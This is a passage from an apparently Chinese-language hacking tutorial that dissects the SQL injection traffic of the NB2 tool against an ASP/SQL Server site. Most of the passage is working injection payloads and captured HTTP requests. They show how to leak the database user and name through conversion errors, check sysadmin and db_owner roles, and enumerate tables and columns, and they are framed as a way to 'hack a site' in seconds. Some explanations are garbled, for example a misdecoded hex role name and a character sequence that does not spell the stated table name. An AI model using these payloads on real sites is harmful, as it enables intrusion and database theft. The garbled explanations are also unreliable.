阅读提示：    前段时间SQL注入很流行，用过小竹的NB2的人可能都知道，这个工具接近无敌，菜鸟用了它也能数秒把一个站给黑了，但是不了解其中的注入过程 可以说永远都进步不了吧~~

   首先声明，我也只是菜鸟一个，正好最近在研究SQL,随便把NB2的注入过程给研究了一个，所用工具wse,相信大家不会陌生的，网上到处有得下，我给一个地址，_blank>http://www.gxgl.com/soft/WSE06b1.zip，这是一个用来监视和修改网络发送和接收数据的程序，可以用来帮助您调试网络应用程序。

    废话少说，开工，先在网上随便找一个有SQL注入漏洞得站点_blank>www.testdb.net，找到一个注射点：_read.asp?id=80" target=_blank>http://www.testdb.net/article_read.asp?id=80

呵呵，_blank>www.testdb.net这个网址当然是不存在了。


过程一、取得SQl Server数据库信息

打开nb2,输入地址：_read.asp?id=80" target=_blank>http://www.testdb.net/article_read.asp?id=80，选择"get"方式，点"检测"按钮，
取得SQl Server数据库得如下信息：


多句执行：未知
子查询：支持
当前用户：test
用户权限：DB_OWNER
当前库：testdb

用过nb2的人应该都很熟悉上面的内容把~~

%20解释为空格 %2B解释为+号，%25解释为%号


HTTP/1.1 200 OK     //返回成功
HTTP/1.1 500 Internal Server Error

用wse检测Get包信息，如下：

GET /article_read.asp?id=80 HTTP/1.1

GET /article_read.asp?id=80%20and%20user%2Bchar(124)=0 HTTP/1.1
即：article_read.asp?id=80 and user+char(124)=0
  char(124)为字符'|'

GET /article_read.asp?id=80;declare%20@a%20int-- HTTP/1.1
即：article_read.asp?id=80;declare @a int--
//判断是否支持多句查询

GET /article_read.asp?id=80%20and%20(Select%20count(1)%20from%20[sysobjects])>=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: _blank>www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80%3Bdeclare+%40a+int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 and (Select count(1) from [sysobjects])>=0
//判断是否支持子查询

GET /article_read.asp?id=80%20And%20user%2Bchar(124)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: _blank>www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And user+char(124)=0
//取得当前用户
user是SQLServer的一个内置变量，它的值是当前连接的用户名，类型为nvarchar。拿一个nvarchar的值跟int的数0比较，系统会先试图将

nvarchar的值转成int型，转的过程中肯定会出错，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值 "east_asp" 转

换数据类型为 int 的列时发生语法错误，呵呵，east_asp正是变量user的值，这样，不废吹灰之力就拿到了数据库的用户名。and user>0


GET /article_read.asp?id=80%20And%20Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)

=1 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: _blank>www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

函数说明：

IS_SRVROLEMEMBER指明当前的用户登录是否是指定的服务器角色的成员。

语法
IS_SRVROLEMEMBER ( 'role' [ , 'login' ] )

参数
'role' 被检查的服务器角色的名称。role 的数据类型为 sysname。
role 有效的值是： sysadmin,dbcreator,diskadmin,processadmin,serveradmin,etupadmin,securityadmin

'login'

将要检查的登录的可选名称。login 的数据类型为 sysname，默认值为 NULL。如果未指定，那么使用当前用户的登录帐户。

select Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124) 结果为"1|"


GET /article_read.asp?id=80%20And%20Cast(IS_MEMBER(0x640062005F006F0077006E0065007200)%20as%20varchar(1))%2Bchar(124)=1

HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: _blank>www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;
ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124)=1

select Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))+char(124) 结果为"1|",和上面得返回结果一样，但注意

IS_MEMBER里面的那一长字符串和上面的不一样，不知代表什么意思，0x730079007300610064006D0069006E00转化后为"|O|@ E "，本以为

是"sysadmin"类似的字串，但看来不是，算了，不想了，呵呵，但我想，其作用应该是取得当前用户的权限把，如：DB_OWNER


GET /article_read.asp?id=80%20And%20db_name()%2Bchar(124)=0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: _blank>www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%3D0;

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED

即：article_read.asp?id=80 And db_name()+char(124)=0
这一句，看到有一个db_name()函数，不用多说，大家应该知道了，db_name()是另一个系统变量，返回的是连接的数据库名。

到次，获取SQL数据库信息的过程算是分析完毕。

另：post方法不再详细分析，大家可自己看一下，下面是post方法时抓的包，具体同Get方法基本一样,主要看最后一行的信息。
其中也用到很多技巧：如下：

id=80%20and%20user%2Bchar(124)=0
id=80'%20and%20user%2Bchar(124)=0%20and%20''='
id=80%25'%20and%20user%2Bchar(124)=0%20and%20'%25'='
id=80%20And%201=1
id=80%20And%201=2
id=80'%20And%201=1%20And%20''='
id=80'%20And%201=2%20And%20''='
id=80%25'%20And%201=1%20And%20'%25'='
id=80%25'%20And%201=2%20And%20'%25'='

//////////////////////////////////////////////

过程二、猜解表名

Top1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%

20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1

即：article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from
  [testdb]..[sysobjects] Where xtype=char(85) order by id) T order by id desc)>0
  char(85)='U'

作用是取得testdb数据库第一个表的表名，以此类推Top N,可以取得其它的表名。


Top2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%202%20id,name%

20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1

...

TopN


wse抓获的包信息：

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from(Select%20Top%201%20id,name%

20from%20[testdb]..[sysobjects]%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: _blank>www.testdb.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED; articleid=80+and+%28Select+count%281%29+from+%5Bsysobjects%5D%29%3E%

3D0

...........

//////////////////////////////////////////////

过程三、根据某个表名猜解列名
表名：article

Top1

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%

20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%

2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%

2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1

即：article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From
  [testdb]..[syscolumns] Where id = OBJECT_ID(NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+
  NCHAR(116)+NCHAR(46)+NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69))
  Order by colid) T Order by colid desc)>0

作用是取得article表的第一个列的列名，以此类推Top N,可以取得其它的列名。

函数说明：

OBJECT_ID 返回数据库对象标识号。

语法 OBJECT_ID ( 'object' )

参数 'object'
要使用的对象。object 的数据类型为 char 或 nchar。如果 object 的数据类型是 char，那么隐性将其转换成 nchar。

返回类型 int


NCHAR(101)+NCHAR(97)+NCHAR(115)+NCHAR(116)+NCHAR(104)+NCHAR(111)+NCHAR(116)+NCHAR(46)+
NCHAR(46)+NCHAR(65)+NCHAR(82)+NCHAR(84)+NCHAR(73)+NCHAR(67)+NCHAR(76)+NCHAR(69)

对应于字符串 testdb..ARTICLE

即是：article_read.asp?id=80 And (Select Top 1 cast(name as varchar(8000)) from (Select Top 1 colid,name From
    [testdb]..[syscolumns] Where id = OBJECT_ID('testdb..ARTICLE')
    Order by colid) T Order by colid desc)>0


Top2

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%202%

20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%

2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%

2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1


TopN

...


wse抓获的包信息：

GET /article_read.asp?id=80%20And%20(Select%20Top%201%20cast(name%20as%20varchar(8000))%20from%20(Select%20Top%201%

20colid,name%20From%20[testdb]..[syscolumns]%20Where%20id%20=%20OBJECT_ID(NCHAR(101)%2BNCHAR(97)%2BNCHAR(115)%2BNCHAR(116)%

2BNCHAR(104)%2BNCHAR(111)%2BNCHAR(116)%2BNCHAR(46)%2BNCHAR(46)%2BNCHAR(65)%2BNCHAR(82)%2BNCHAR(84)%2BNCHAR(73)%2BNCHAR(67)%

2BNCHAR(76)%2BNCHAR(69))%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.00.8862
Host: _blank>www.testdb.net
Connection: Keep-Alive
Cache-Control: n

[1] [2] 下一页

您对本文章有什么意见或着疑问吗？请到论坛讨论您的关注和建议是我们前行的参考和动力